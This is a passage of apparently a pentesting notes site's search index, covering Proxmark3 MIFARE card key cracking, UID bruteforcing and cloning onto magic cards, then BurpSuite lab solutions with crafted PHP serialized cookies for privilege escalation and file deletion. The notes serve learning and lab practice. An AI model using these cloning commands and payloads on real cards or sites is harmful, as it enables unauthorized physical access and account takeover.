00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  29 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  31 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    8 |  32 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  35 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    9 |  36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  39 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   10 |  40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  41 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  42 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  43 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   11 |  44 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  45 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  46 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  47 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   12 |  48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  51 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   13 |  52 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  53 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  54 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  55 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   14 |  56 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  57 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  58 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  59 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   15 |  60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  61 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  62 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  63 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=] -----+-----+-------------------------------------------------+-----------------\n\n[+] Saved 1024 bytes to binary file `/home/ME/hf-mf-<UID>-dump.bin`\n[+] Saved to json file `/home/ME/hf-mf-<UID>-dump.json`\n

        At this point we\u2019ve got everything we need from the card, we can take it off the reader.

        Now there are two ways to proceed:

        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#way-1-cload","title":"Way 1: cload","text":"

        Create an eml file with the previously obtained dump binary file:

        # First go to <yourpath>/proxmark/tools/\ncd proxmark/tools/\n\n# Run the script pm3_mfd2eml.py \n python3 ./pm3_mfd2eml.py /home/PATH/hf-mf-<UI>-dump.bin /home/PATH/hf-mf-UID-dump.eml\n

        Load the eml file into your magic card:

        hf mf cload -f /home/PATH/hf-mf-<UID>-dump.eml\n
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#way-2-restore","title":"Way 2: restore","text":"

        To copy that data onto a new card, place the (Chinese backdoor) card on the proxmark:

        hf mf restore --1k --uid <UID\u00ba> -k /home/ME/hf-mf-<UID>-key.bin\n

        This restores the dumped data onto the new card. Now we just need to give the card the UID we got from the original hf search command:

        hf mf csetuid --uid <UID>\n
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#resources","title":"Resources","text":"

        https://jaymonsecurity.com/seguridad-clonar-tarjeta-proxmark-red-team/

        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-desfire/","title":"Mifare Desfire","text":"","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-desfire/#basic-commands","title":"Basic commands","text":"
        # Recover AIDs by bruteforce\nhf mfdes bruteaid\n
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/","title":"Installing proxmark3 RDV4.01 in Kali","text":"

        Basic usage

        ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#preparing-linux","title":"Preparing Linux","text":"

        In my case, I will create a Virtual environment:

        mkvirtualenv nfc\n

        An system upgrade was carried out prior to following these instructions.

        Update the packages list

        sudo apt-get update\nsudo apt-get upgrade -y\nsudo apt-get auto-remove -y\n

        Install the requirements

        sudo apt-get install --no-install-recommends git ca-certificates build-essential pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev libssl-dev libgd-dev\n

        Clone the repository:

        git clone https://github.com/RfidResearchGroup/proxmark3.git\n

        Check ModemManager. Make sure ModemManager will not interfere, otherwise it could brick your Proxmark3! Modem Manager must be discarded.

        ModemManager is pre-installed on many different Linux distributions, very probably yours as well. It's intended to prepare and configure the mobile broadband (2G/3G/4G) devices, whether they are built-in or dongles. Some are serial, so when the Proxmark3 is plugged and a\u00a0/dev/ttyACM0\u00a0appears, ModemManager attempts to talk to it to see if it's a modem replying to AT commands. Now imagine what happens when you're flashing your Proxmark3 and ModemManager suddenly starts sending bytes to it at the same time... Yes it makes the flashing failing. And if it happens while you're flashing the bootloader, it will require a JTAG device to unbrick the Proxmark3. ModemManager is a threat for the Proxmark3, but also for many other embedded devices, such as some Arduino platforms.

        # Solution 1: remove ModemManager\nsudo apt remove modemmanager\n\n# Solution 2: disable ModemManager\nsudo systemctl stop ModemManager\nsudo systemctl disable ModemManager\n

        Troubleshooting issues with ModemManager

        Connect your device using the USB cable and check that the proxmark is being picked up by your computer:

        sudo dmesg | grep -i usb\n

        It should show up as a CDC device:

        usb 3-3: Product: proxmark3\nusb 3-3: Manufacturer: proxmark.org\nusb 3-3: SerialNumber: iceman\ncdc_acm 3-3:1.0: ttyACM0: USB ACM device\n

        And a new\u00a0/dev/ttyACM0\u00a0should have appeared:

        ls -la /dev | grep ttyACM0    \n

        Get permissions to use /dev/ttyACM0. Add current user to the proper groups to get permission to use\u00a0/dev/ttyACM0. This step can be done from the Iceman Proxmark3 repo with:

        make accessrights\n

        Then, you need to logout and login in again for your new group membership to be fully effective.

        To test you have the proper read & write rights, plug the Proxmark3 and execute:

        [ -r /dev/ttyACM0 ] && [ -w /dev/ttyACM0 ] && echo ok\n

        It must return ok. Otherwise this means you've got a permission problem to fix.

        ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#compilation-instructions-for-rdv4","title":"Compilation instructions for RDV4","text":"

        The repo defaults for compiling a firmware and client suitable for Proxmark3 RDV4.

        Get the latest commits:

        cd proxmark3\ngit pull\n

        Clean and compile everything:

        make clean && make -j\n

        if you got an error, go to the\u00a0troubleshooting guide.

        Install, but be carefull, if you do

        sudo make install\n

        Then the required files will be installed on your system, by default in\u00a0/usr/local/bin\u00a0and\u00a0/usr/local/share/proxmark3. Maintainers can read\u00a0this doc\u00a0to learn how to modify installation paths via\u00a0DESTDIR\u00a0and\u00a0PREFIX\u00a0Makefile variables.

        The commands given in the documentation assume you did the installation step. If you didn't, you've to adjust the commands paths and files paths accordingly, e.g. calling\u00a0./pm3\u00a0or\u00a0client/proxmark3\u00a0instead of just\u00a0pm3\u00a0or\u00a0proxmark3.

        In most cases, you can run the following script which try to auto-detect the port to use, on several OS:

        pm3-flash-all\n

        if not working: go to troubleshooting

        Run the client: In most cases, you can run the script\u00a0pm3\u00a0which try to auto-detect the port to use, on several OS.

        ./pm3\n

        For the other cases, specify the port by yourself. For example, for a Proxmark3 connected via USB under Linux. Here, for example, for a Proxmark3 connected via USB under Linux (adjust the port for your OS):

        proxmark3 /dev/ttyACM0\n

        or from the local repo

        client/proxmark3 /dev/ttyACM0\n

        If all went well you should get some information about the firmware and memory usage as well as the prompt, something like this.

        [=] Session log /home/iceman/.proxmark3/logs/log_20230208.txt\n[+] loaded from JSON file /home/iceman/.proxmark3/preferences.json\n[=] Using UART port /dev/ttyS3\n[=] Communicating with PM3 over USB-CDC\n\n\n  8888888b.  888b     d888  .d8888b.\n  888   Y88b 8888b   d8888 d88P  Y88b\n  888    888 88888b.d88888      .d88P\n  888   d88P 888Y88888P888     8888\"\n  8888888P\"  888 Y888P 888      \"Y8b.\n  888        888  Y8P  888 888    888\n  888        888   \"   888 Y88b  d88P\n  888        888       888  \"Y8888P\"    [ \u2615 ]\n\n\n [ Proxmark3 RFID instrument ]\n\n    MCU....... AT91SAM7S512 Rev A\n    Memory.... 512 Kb ( 66% used )\n\n    Client.... Iceman/master/v4.16191 2023-02-08 22:54:30\n    Bootrom... Iceman/master/v4.16191 2023-02-08 22:54:26\n    OS........ Iceman/master/v4.16191 2023-02-08 22:54:27\n    Target.... RDV4\n\n[usb] pm3 -->\n

        This\u00a0[usb] pm3 --> \u00a0is the Proxmark3 interactive prompt.

        ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#configuration-and-verification","title":"Configuration and Verification","text":"

        Verify the status of your installation with:

        script run init_rdv4\n

        To make sure you got the latest sim module firmware:

        hw status\n

        If you get a message such as:

        [#] Smart card module (ISO 7816)\n[#]   version................. vX.XX ( Outdated )\n

        Then, the version is obsolete and you will need to update it. The following command upgrades your device sim module firmware. Don't not turn off your device during the execution of this command!! Even its a quite fast command you should be warned. You may brick it if you interrupt it.

        smart upgrade -f /usr/local/share/proxmark3/firmware/sim014.bin\n\n# or if from local repo\nsmart upgrade -f sim014.bin\n

        You get the following output if the execution was successful:

        [=] --------------------------------------------------------------------\n[!] \u26a0\ufe0f  WARNING - sim module firmware upgrade\n[!] \u26a0\ufe0f  A dangerous command, do wrong and you could brick the sim module\n[=] --------------------------------------------------------------------\n\n[=] firmware file       sim014.bin\n[=] Checking integrity  sim014.sha512.txt\n[+] loaded 3658 bytes from binary file sim014.bin\n[+] loaded 158 bytes from binary file sim014.sha512.txt\n[=] Don't turn off your PM3!\n[+] Sim module firmware uploading to PM3...\n \ud83d\udd51 3658 bytes sent\n[+] Sim module firmware updating...\n[#] FW 0000\n[#] FW 0080\n[#] FW 0100\n[#] FW 0180\n[#] FW 0200\n[#] FW 0280\n[#] FW 0300\n[#] FW 0380\n[#] FW 0400\n[#] FW 0480\n[#] FW 0500\n[#] FW 0580\n[#] FW 0600\n[#] FW 0680\n[#] FW 0700\n[#] FW 0780\n[#] FW 0800\n[#] FW 0880\n[#] FW 0900\n[#] FW 0980\n[#] FW 0A00\n[#] FW 0A80\n[#] FW 0B00\n[#] FW 0B80\n[#] FW 0C00\n[#] FW 0C80\n[#] FW 0D00\n[#] FW 0D80\n[#] FW 0E00\n[+] Sim module firmware upgrade successful    \n

        Run hw status command to verify that the upgrade went well.

        hw status\n
        ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3/","title":"Using Proxmark3 RDV4.01","text":"

        Installation: Installing proxmark3 RDV4.01 in Kali

        ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/proxmark3/#basic-commands","title":"Basic commands","text":"
        # The prompt will have this appearance\n[usb] pm3 --> \n\n# Display help and commands\nhelp\n\n# Close the client\nquit\n

        To get an overview of the available commands for LF RFID and HF RFID:

        [usb] pm3 --> lf\n[usb] pm3 --> hf\n

        To search quickly for known LF or HF tags:

        [usb] pm3 --> lf search\n[usb] pm3 --> hf search\n

        To get info on a ISO14443-A tag:

        [usb] pm3 --> hf 14a info\n

        Read and write:

        # Read sector 1 with key FFFFFFFFFFFF\nhf mf rdsc -s 1 -k FFFFFFFFFFFF\n\n# Read block 13 with key FFFFFFFFFFFF\nhf mf rdbl --blk 13 -k FFFFFFFFFFFF\n\n# Write block 8 with key a FFFFFFFFFFFF \nhf mf wrbl --blk 8 -a -k FFFFFFFFFFFF -d FFFFFFFFFFFF7F078800FFFFFFFFFFFF\n

        Getting keys

        # Check all sectors, all keys, 1K, and write to file\nhf mf chk --1k --dump             \n\n# Check for default keys:\nhf mf chk --1k -f mfc_default_keys\n\n# Check dictionary against block 0, key A\nhf mf chk -a --tblk 0 -f mfc_default_keys.dic       \n\n# Run autopwn, to extract all keys and backup a MIFARE Classic tag\nhf mf autopwn\n\n\nhf mf nested --1k --blk 0 -a -k FFFFFFFFFFFF --dump\n\n# Dump MIFARE Classic card contents:\nhf mf dump\nhf mf dump --1k -k hf-mf-A29558E4-key.bin -f hf-mf-A29558E4-dump.bin\n\n\n# Write to MIFARE Classic block:\nhf mf wrbl --blk 0 -k FFFFFFFFFFFF -d d3a2859f6b880400c801002000000016\n\n\n# Bruteforce MIFARE Classic card numbers from 11223344 to 11223346:\nscript run hf_mf_uidbruteforce -s 0x11223344 -e 0x11223346 -t 1000 -x mfc\n\n# Bruteforce MIFARE Ultralight EV1 card numbers from 11223344556677 to 11223344556679\nscript run hf_mf_uidbruteforce -s 0x11223344556677 -e 0x11223344556679 -t 1000 -x mfu\n
        ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/proxmark3/#next-steps","title":"Next steps","text":"
        • https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/cheatsheet.md
        • https://github.com/Proxmark/proxmark3/wiki/Generic-ISO14443-Ops
        • https://github.com/RfidResearchGroup/proxmark3/wiki/More-cheat-sheets
        ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/rfid/","title":"RFID","text":"

        RFID Reader continuously sends Radio Waves. When the Tag is in the range it sends its feedback signals to the read.

        Types of RFID Frequencies. There are Three Basic Types of RFID Frequencies:

        • Low Frequency (LF) 125 kHz or 134 kHz Range 8-10 cm
        • High Frequency (HF) 13.56 MHz Range approx. 1 m
        • Ultra High Frequency (UHF) 860-960 MHz Range 10 - 15 m
        ","tags":["pentesting","RFID"]},{"location":"RFID/rfid/#quick-overview-of-arduino","title":"Quick Overview of Arduino","text":"
        • Arduino is an open-source hardware
        • Single board with microcontroller (ATmega328P )
        • Attach different modules and sensors
        • Different versions of Arduino

        Download Arduino IDE.

        ","tags":["pentesting","RFID"]},{"location":"RFID/rfid/#requirements","title":"Requirements","text":"

        RFID Cards we need. - Mifare classic cards (1K, 4K, EV1): UID is not changeable. - Magic cards: In magic cards, UID is changeable.

        For programming Mifare we will use

        • ACR122u
        • MFRC522 with STMB
        • USB to TTL
        • STM8 & STM32 USB
        • Jumper wires (female to female)

        More tools require:

        • Arduino UNO
        • RC522 Module
        • OLED 4 Pin
        • Breadboard
        • Jumper wires
        • Buzzer
        ","tags":["pentesting","RFID"]},{"location":"burpsuite/burpsuite-broken-access-control/","title":"BurpSuite Labs - Broken access control vulnerabilities","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#unprotected-admin-functionality","title":"Unprotected admin functionality","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation","title":"Enunciation","text":"

        This lab has an unprotected admin panel.

        Solve the lab by deleting the user\u00a0carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution","title":"Solution","text":"

        See the robots.txt page. Enter the admin panel url in the browser and delete the user carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#unprotected-admin-functionality-with-unpredictable-url","title":"Unprotected admin functionality with unpredictable URL","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_1","title":"Enunciation","text":"

        This lab has an unprotected admin panel. It's located at an unpredictable location, but the location is disclosed somewhere in the application.

        Solve the lab by accessing the admin panel, and using it to delete the user\u00a0carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_1","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-role-controlled-by-request-parameter","title":"User role controlled by request parameter","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_2","title":"Enunciation","text":"

        This lab has an admin panel at\u00a0/admin, which identifies administrators using a forgeable cookie.

        Solve the lab by accessing the admin panel and using it to delete the user\u00a0carlos.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_2","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-role-can-be-modified-in-user-profile","title":"User role can be modified in user profile","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_3","title":"Enunciation","text":"

        This lab has an admin panel at\u00a0/admin. It's only accessible to logged-in users with a\u00a0roleid\u00a0of 2.

        Solve the lab by accessing the admin panel and using it to delete the user\u00a0carlos.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_3","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#url-based-access-control-can-be-circumvented","title":"URL-based access control can be circumvented","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_4","title":"Enunciation","text":"

        This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.

        To solve the lab, access the admin panel and delete the user carlos.`

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_4","title":"Solution","text":"

        You will see a 302 and following the redirection, a 403, BUT update the lab page and you will see that lab was successfully passed.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#method-based-access-control-can-be-circumvented","title":"Method-based access control can be circumvented","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_5","title":"Enunciation","text":"

        This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

        To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_5","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter","title":"User ID controlled by request parameter","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_6","title":"Enunciation","text":"

        This lab has a horizontal privilege escalation vulnerability on the user account page.

        To solve the lab, obtain the API key for the user\u00a0carlos\u00a0and submit it as the solution.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_6","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-unpredictable-user-ids","title":"User ID controlled by request parameter, with unpredictable user IDs","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_7","title":"Enunciation","text":"

        This lab has a horizontal privilege escalation vulnerability on the user account page, but identifies users with GUIDs.

        To solve the lab, find the GUID for carlos, then submit his API key as the solution.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_7","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-data-leakage-in-redirect","title":"User ID controlled by request parameter with data leakage in redirect","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_8","title":"Enunciation","text":"

        This lab contains an access control vulnerability where sensitive information is leaked in the body of a redirect response.

        To solve the lab, obtain the API key for the user carlos and submit it as the solution.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_8","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-password-disclosure","title":"User ID controlled by request parameter with password disclosure","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_9","title":"Enunciation","text":"

        This lab has user account page that contains the current user's existing password, prefilled in a masked input.

        To solve the lab, retrieve the administrator's password, then use it to delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_9","title":"Solution","text":"

        Log in as administrator, go to the admin panel, and delete carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#insecure-direct-object-references","title":"Insecure direct object references","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_10","title":"Enunciation","text":"

        This lab stores user chat logs directly on the server's file system, and retrieves them using static URLs.

        Solve the lab by finding the password for the user carlos, and logging into their account.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_10","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#multi-step-process-with-no-access-control-on-one-step","title":"Multi-step process with no access control on one step","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_11","title":"Enunciation","text":"

        This lab has an admin panel with a flawed multi-step process for changing a user's role. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

        To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_11","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#referer-based-access-control","title":"Referer-based access control","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_12","title":"Enunciation","text":"

        This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

        To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_12","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-insecure-deserialization/","title":"BurpSuite Labs - Insecure deserialization","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#modifying-serialized-objects","title":"Modifying serialized objects","text":"

        APPRENTICE Modifying serialized objects

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and is vulnerable to privilege escalation as a result. To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution","title":"Solution","text":"
        # Burp solution\n\n1. Log in using your own credentials. Notice that the post-login `GET /my-account` request contains a session cookie that appears to be URL and Base64-encoded.\n2. Use Burp's Inspector panel to study the request in its decoded form. Notice that the cookie is in fact a serialized PHP object. The `admin` attribute contains `b:0`, indicating the boolean value `false`. Send this request to Burp Repeater.\n3. In Burp Repeater, use the Inspector to examine the cookie again and change the value of the `admin` attribute to `b:1`. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n4. Send the request. Notice that the response now contains a link to the admin panel at `/admin`, indicating that you have accessed the page with admin privileges.\n5. Change the path of your request to `/admin` and resend it. Notice that the `/admin` page contains links to delete specific user accounts.\n6. Change the path of your request to `/admin/delete?username=carlos` and send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#modifying-serialized-data-types","title":"Modifying serialized data types","text":"

        PRACTITIONER Modifying serialized data types

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_1","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_1","title":"Solution","text":"

        Capture the Cookie session of the regular user wiener:peter. Send a request containing the cookie to Repeater module. Use the inspector to modify the value of the cookie:

        Original values:

        O:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:12:\"access_token\";s:32:\"bzz9fbv8uzas714errnha1q5ppbzyf5h\";}\n

        Crafted values:

        O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0;}\n

        What we did:

        • Update the length of the username attribute to 13.
        • Change the username to administrator.
        • Change the access token to the integer 0. As this is no longer a string, you also need to remove the double-quotes surrounding the value.
        • Update the data type label for the access token by replacing s with i.

        # Burp solution\n1. Log in using your own credentials. In Burp, open the post-login `GET /my-account` request and examine the session cookie using the Inspector to reveal a serialized PHP object. Send this request to Burp Repeater.\n2. In Burp Repeater, use the Inspector panel to modify the session cookie as follows:\n\n    - Update the length of the `username` attribute to `13`.\n    - Change the username to `administrator`.\n    - Change the access token to the integer `0`. As this is no longer a string, you also need to remove the double-quotes surrounding the value.\n    - Update the data type label for the access token by replacing `s` with `i`.\n\n    The result should look like this:\n\n    `O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0;}`\n3. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n4. Send the request. Notice that the response now contains a link to the admin panel at `/admin`, indicating that you have successfully accessed the page as the `administrator` user.\n5. Change the path of your request to `/admin` and resend it. Notice that the `/admin` page contains links to delete specific user accounts.\n6. Change the path of your request to `/admin/delete?username=carlos` and send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#using-application-functionality-to-exploit-insecure-deserialization","title":"Using application functionality to exploit insecure deserialization","text":"

        PRACTITIONER Using application functionality to exploit insecure deserialization

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_2","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos's home directory.

        You can log in to your own account using the following credentials: wiener:peter

        You also have access to a backup account: gregg:rosebud

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_2","title":"Solution","text":"

        In the user profile there is a DELETE feature that allows users to delete their profile. When doing so, the functionality of the application is relaying on the path provided in the cookie session (which is part of the user object) to remove the avatar.

        Exploit would be changing the path to a file that we want to remove and update the string length of the path.

        # Burp solution\n1. Log in to your own account. On the \"My account\" page, notice the option to delete your account by sending a `POST` request to `/my-account/delete`.\n2. Send a request containing a session cookie to Burp Repeater.\n3. In Burp Repeater, study the session cookie using the Inspector panel. Notice that the serialized object has an `avatar_link` attribute, which contains the file path to your avatar.\n4. Edit the serialized data so that the `avatar_link` points to `/home/carlos/morale.txt`. Remember to update the length indicator. The modified attribute should look like this:\n\n    `s:11:\"avatar_link\";s:23:\"/home/carlos/morale.txt\"`\n5. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n6. Change the request line to `POST /my-account/delete` and send the request. Your account will be deleted, along with Carlos's `morale.txt` file.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#arbitrary-object-injection-in-php","title":"Arbitrary object injection in PHP","text":"

        PRACTITIONER Arbitrary object injection in PHP

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_3","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and is vulnerable to arbitrary object injection as a result. To solve the lab, create and inject a malicious serialized object to delete the morale.txt file from Carlos's home directory. You will need to obtain source code access to solve this lab.

        You can log in to your own account using the following credentials: wiener:peter

        You can sometimes read source code by appending a tilde (~) to a filename to retrieve an editor-generated backup file.

